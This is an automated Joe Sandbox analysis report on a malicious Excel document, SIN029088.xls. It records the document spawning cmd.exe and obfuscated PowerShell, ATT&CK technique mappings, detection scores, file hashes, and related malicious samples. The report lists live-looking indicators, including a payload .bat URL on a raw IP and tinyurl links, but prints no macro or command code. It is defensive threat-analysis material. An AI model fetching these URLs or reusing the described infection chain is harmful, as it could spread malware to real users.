External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 319129 Sample: SIN029088.xls Startdate: 18/11/2020 Architecture: WINDOWS Score: 80 46 Multi AV Scanner detection for submitted file 2->46 48 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->48 50 Obfuscated command line found 2->50 52 4 other signatures 2->52 8 EXCEL.EXE 56 25 2->8         started        process3 file4 42 C:\Users\user\AppData\...\SIN029088.xls.LNK, MS 8->42 dropped 54 Obfuscated command line found 8->54 56 Document exploit detected (process start blacklist hit) 8->56 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        17 cmd.exe 1 8->17         started        19 2 other processes 8->19 signatures5 process6 signatures7 58 Obfuscated command line found 12->58 21 powershell.exe 15 17 12->21         started        24 conhost.exe 12->24         started        26 powershell.exe 16 15->26         started        28 conhost.exe 15->28         started        30 powershell.exe 20 17->30         started        32 conhost.exe 17->32         started        34 powershell.exe 26 19->34         started        36 powershell.exe 16 19->36         started        38 2 other processes 19->38 process8 dnsIp9 44 tinyurl.com 104.20.139.65, 443, 49688 CLOUDFLARENETUS United States 21->44 40 attrib.exe 26->40         started        process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SIN029088.xls8%VirustotalBrowse
SIN029088.xls2%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat4%VirustotalBrowse
http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat0%Avira URL Cloudsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://tinyurl.com4#f0%Avira URL Cloudsafe
https://contoso.com/0%VirustotalBrowse
https://contoso.com/0%Avira URL Cloudsafe
https://contoso.com/License0%VirustotalBrowse
https://contoso.com/License0%Avira URL Cloudsafe
https://contoso.com/Icon0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tinyurl.com
104.20.139.65
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpfalse
      		high
      https://tinyurl.compd.bat.15.drfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpfalse
          		high
          http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.batpowershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpfalse
          • 4%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://go.micropowershell.exe, 00000006.00000003.402281824.0000000005F86000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.412229988.0000000005E9B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.444126941.00000000054C6000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.415829479.0000000005B1B000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.454341121.000000000562A000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://connect.facebook.net/en_US/fbevents.jspowershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, pd.bat.15.drfalse
            		high
            https://tinyurl.com/y252oqq3PowerShell_transcript.302494.O2kFUmpi.20201118025653.txt.15.drfalse
              		high
              https://tinyurl.com4#fpowershell.exe, 0000000F.00000002.458239803.000000000595A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpfalse
                		high
                http://tinyurl.compowershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmpfalse
                  		high
                  https://contoso.com/Licensepowershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://api.pushnami.com/scripts/v1/pushnami-adv/5c018cb890535b0010a5ea87powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.441613141.0000000005551000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.461718645.0000000005471000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.434434476.0000000004C31000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.480221111.00000000050F1000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.449944220.0000000005421000.00000004.00000001.sdmpfalse
                      		high
                      https://tinyurl.com/app/nospam/tinyurl.com/y252oqq3/terminatedpowershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmpfalse
                          		high
                          https://tinyurl.com/powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp, pd.bat.15.drfalse
                            		high
                            https://tinyurl.com/favicon.icopowershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.drfalse
                              		high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              104.20.139.65
                              		unknownUnited States
                              		13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:319129
                              Start date:18.11.2020
                              Start time:02:55:46
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 10m 3s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:SIN029088.xls
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Run name:Potential for more IOCs and behavior
                              Number of analysed new started processes analysed:32
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal80.expl.evad.winXLS@28/31@1/1
                              EGA Information:
                              • Successful, ratio: 75%
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 260
                              • Number of non-executed functions: 8
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xls
                              • Changed system and user locale, location and keyboard layout to French - France
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, wermgr.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                              • Excluded IPs from analysis (whitelisted): 2.20.84.85, 67.27.235.126, 8.248.147.254, 8.248.131.254, 8.248.115.254, 8.241.11.254, 40.88.32.150
                              • Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, umwatsonrouting.trafficmanager.net, fs.microsoft.com, audownload.windowsupdate.nsatc.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, au-bg-shim.trafficmanager.net
                              • Execution Graph export aborted for target powershell.exe, PID 4824 because it is empty
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              02:57:47API Interceptor375x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              104.20.139.65https://tinyurl.com/y5tjuap2Get hashmaliciousBrowse
                                http://tinyurl.comGet hashmaliciousBrowse
                                  WayBill Invoice.xlsGet hashmaliciousBrowse
                                    WayBill Invoice.xlsGet hashmaliciousBrowse
                                      rooney-eng-598583_xls.HtMlGet hashmaliciousBrowse
                                        New PO 9380.xlsGet hashmaliciousBrowse
                                          New PO 9380.xlsGet hashmaliciousBrowse
                                            azklima-584035_xls.HtMlGet hashmaliciousBrowse
                                              AWB.xlsGet hashmaliciousBrowse
                                                INVOICE N.1.xlsGet hashmaliciousBrowse
                                                  PROFORMA INVOICE INV-2.xlsGet hashmaliciousBrowse
                                                    Invoice 098734543 3.xlsGet hashmaliciousBrowse
                                                      https://naset.ocry.com/#g.rohl@sbo.co.atGet hashmaliciousBrowse
                                                        https://tinyurl.com/y4pw4oeyGet hashmaliciousBrowse
                                                          https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fjoom.ag%2f9BjC&c=E,1,FEe77b6JikuybnZvWSPMtboj3kXPvfEd96gDBaPRghPkeeNMaiZ00lHXg2CVBvQXKcXw8950i4VfR2mq9wGKru5dQgG78LY4-xUIpbnM8tgzj5oG4pdo95PFgkNDQw,,&typo=1%3eGet hashmaliciousBrowse
                                                            https://glennbrowitt.com.au/hotel/index.html#scammer@outlook.comGet hashmaliciousBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              tinyurl.comhttps://tinyurl.com/y5tjuap2Get hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              SMBS PO 30 quotation.xlsGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              https://tinyurl.com/y5tjuap2Get hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              http://tinyurl.comGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              viaseating-666114_xls.HtMlGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              https://tinyurl.com/venmosuppGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              WayBill Invoice.xlsGet hashmaliciousBrowse
                                                              • 172.67.1.225
                                                              WayBill Invoice.xlsGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              WayBill Invoice.xlsGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              tetratech-907745_xls.HtMlGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              Waybill Invoice.xlsGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              Waybill Invoice.xlsGet hashmaliciousBrowse
                                                              • 172.67.1.225
                                                              Waybill Invoice.xlsGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              rooney-eng-598583_xls.HtMlGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              Overdue Payments.xlsGet hashmaliciousBrowse
                                                              • 172.67.1.225
                                                              Overdue Payments.xlsGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              New PO 9380.xlsGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              New PO 9380.xlsGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              lorino-106812_xls.HtMlGet hashmaliciousBrowse
                                                              • 172.67.1.225

                                                              ASN

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              CLOUDFLARENETUSSIN029088.xlsGet hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              Request for Quote_PDF.vbsGet hashmaliciousBrowse
                                                              • 104.24.127.89
                                                              01_file.exeGet hashmaliciousBrowse
                                                              • 104.24.127.89
                                                              TRP SHA58-5310.xlsxGet hashmaliciousBrowse
                                                              • 172.67.160.188
                                                              00INVOICE-POLYMERS INC.PO00236-972.xlsxGet hashmaliciousBrowse
                                                              • 172.67.170.41
                                                              Payment copy.docGet hashmaliciousBrowse
                                                              • 162.159.129.233
                                                              anthony.exeGet hashmaliciousBrowse
                                                              • 23.227.38.64
                                                              aguhvLvn.exeGet hashmaliciousBrowse
                                                              • 104.23.98.190
                                                              com.amazon.mShop.android.shopping.apkGet hashmaliciousBrowse
                                                              • 172.64.106.5
                                                              https://bs29579.github.io/cndappip/abt.html?bbre=dsiw4rsd&c=E,1,SxbbXE4aBN7RegSa5xBoOsMB9lXPvUu-vFsUmj7NnZylt4IvMofpzS6coILe4vEfnHDWMz7JUiiOV93EiQiXjjBJoSca9ZjldH7lFvPhpVatNVF9s1hZbQ,,&typo=1Get hashmaliciousBrowse
                                                              • 104.16.18.94
                                                              https://fax-dfc26d.webflow.io/Get hashmaliciousBrowse
                                                              • 104.16.126.175
                                                              https://www.canva.com/design/DAENxfvgrAs/5Tn-gJFr52_HLDFhOay41A/view?utm_content=DAENxfvgrAs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                              • 104.18.215.67
                                                              https://tinyurl.com/y5tjuap2Get hashmaliciousBrowse
                                                              • 104.20.138.65
                                                              https://www.notion.so/SECURE-SPACE-e22527e1e84948c0a9e448add2846ea8Get hashmaliciousBrowse
                                                              • 104.18.23.110
                                                              https://oxy.sendx.io/lp/oryxus.htmlGet hashmaliciousBrowse
                                                              • 104.16.18.94
                                                              http://www.flash-rewards.com/PixelEventLogIframe.aspx?FlowID=47581&VID=paVXlaAD1-t3xm47O0s8Sg2&PixelEvtID=16041&fbclid=&gclid=&ckmc=&ckmscn=&ckmscGet hashmaliciousBrowse
                                                              • 172.67.178.4
                                                              https://app.box.com/s/8mkzhwsgsowgkcy046cu3h48c41n72adGet hashmaliciousBrowse
                                                              • 104.16.18.94
                                                              https://www.notion.so/secure-file-f93a8d7efae24a4fb2178eacaac53379Get hashmaliciousBrowse
                                                              • 104.16.19.94
                                                              http://cloudz.pw/go?green=carrier%2048gs-036060301%20operation%20manualGet hashmaliciousBrowse
                                                              • 104.17.69.176
                                                              http://172.67.185.146Get hashmaliciousBrowse
                                                              • 104.16.123.96

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              54328bd36c14bd82ddaa0c04b25ed9adRequest for Quote_PDF.vbsGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              01_file.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              aguhvLvn.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              BlueJeans.2.25.11u.msiGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              2B027105A0C3.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsmGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsmGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsmGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              order2020.PDF.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              SecuriteInfo.com.ArtemisA8D086952534.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              ENJ5AB3B0x.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              web ori2.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              7fYoHeaCBG.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              DETALLE DE PAGO.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              WayBill Invoice.xlsGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              fTAYoI22iY.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              COMSurrogate.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              E1Q0TjeN32.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              hmB9yvFv40.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65
                                                              ZYhucZndrm.exeGet hashmaliciousBrowse
                                                              • 104.20.139.65

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):5829
                                                              Entropy (8bit):4.8968676994158
                                                              Encrypted:false
                                                              SSDEEP:96:WCJ2WoeRo2k6Lm5emSECNgsRP9iM5Dsx+zsJQIzNEuH+OHgMTyZ69smyFRLcU6/3:5xoeRoVsm5eml+iMDOmEN3H+OHgF69si
                                                              MD5:CE11CDA5EB3E7C62CB6DA34341302D93
                                                              SHA1:FD13FA29B26C39C3BF4C0398E180589A93EB5BF0
                                                              SHA-256:7C987D134E81F3D7BD095D9CCEEFA1503C079347FD3546C76326CF779850BE97
                                                              SHA-512:CCC094DCF6FB27EDEA5D77B1CFBA19C0D05321EEF4DAAC77352FC0BB756407643C4493A0E0B8C10E28DF2144B61BA4F53B4B944273F8BDA097DEB70CB8E54C33
                                                              Malicious:false
                                                              Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Set-PSRepository........Update-ScriptFileInfo........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):17556
                                                              Entropy (8bit):5.56313656879534
                                                              Encrypted:false
                                                              SSDEEP:384:NtpLSzIswAF0aVbCLRg4KnbPDulZRIo85QTQ2iwsBMyv1YJzx:6DVz4KzDulnp8OTNyB3S3
                                                              MD5:1E95F63CABDC23B7C1DD2DD7F3B5C8E9
                                                              SHA1:48A04915CAAB1BA33D14EFA46FAEFCB7FFB6E5ED
                                                              SHA-256:5D83E1FDC54FF922B01225CD19F15CB048305D4AE6E6BA2A9FEBA1D54AAE6936
                                                              SHA-512:B1993A7A1478FF5D256F108F6EB0F668CC4A1FA23A9ADC024A0D4C5D6F6E62DD8CE44FBF66B0A95E125B3E68A65F48C999AF6727EBD003E8E0CB0653F7D991B3
                                                              Malicious:false
                                                              Preview: @...e.......................,...y.......;............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                              C:\Users\user\AppData\Local\Temp\F4A10000
                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):52924
                                                              Entropy (8bit):7.84591376672679
                                                              Encrypted:false
                                                              SSDEEP:768:XM08oobmWXbkLwgwE73DFK5Rhdv1nhQgcJPkrTvG+i:80DobmSb4wjE7zF0Rhdv1hQzMrTvG+i
                                                              MD5:F49F6A18EECB85473A532859844E7F07
                                                              SHA1:C357BAB9C967347D05E2E18DEFEF8509896AF0D3
                                                              SHA-256:BE122157CDD1E6520A117546F0FE502454D15E44AE5B60A0E999240C988121AD
                                                              SHA-512:DEF0429EE9FD834097B80719B2AFF09B58F611B18EFB5CBBB2F912DB6ABFC7A9D9F4FEF450770E02D1368A20D84282AA08DC450CAE6531279AA13CC19D68150A
                                                              Malicious:false
                                                              Preview: ...N.0.E.H.C.-J.@.5e.e.H.......<ni..q..@}El"...3s3....b...w5.V.V..^i7....Sy..L.)a...m.....b.....E;.Y.R...e.V`..8:..hE..8.A......n....Ke..l<z..X.TL...d..+...eT.D.FK.(Q.r.........\Z..0D....dM..&b|...0d|/3.....9.?"..~iv>T.....xEf. ..>tq/...VP.....%....O..S...q.l.....L.:VY!..815@gB........P..i..>....r....hg.~...v...#Q..o...{<.V........k.j..'.*..|ux......1..............@B....m...;"M....y.)P{..../.......PK..........!.R...............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H.....
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2akchdup.3gl.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2n1n20xl.n02.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4khsavhq.hlq.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aq5p0uwt.qi0.psm1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0jio5ua.cxb.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwuq0g54.tbl.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                              Malicious:false
                                                              Preview: 1
                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2c2vjrm.bvc.ps1
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:very short file (no magic)
                                                              Category:dropped
                                                              Size (bytes):1
                                                              Entropy (8bit):0.0
                                                              Encrypted:false
                                                              SSDEEP:3:U:U
                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
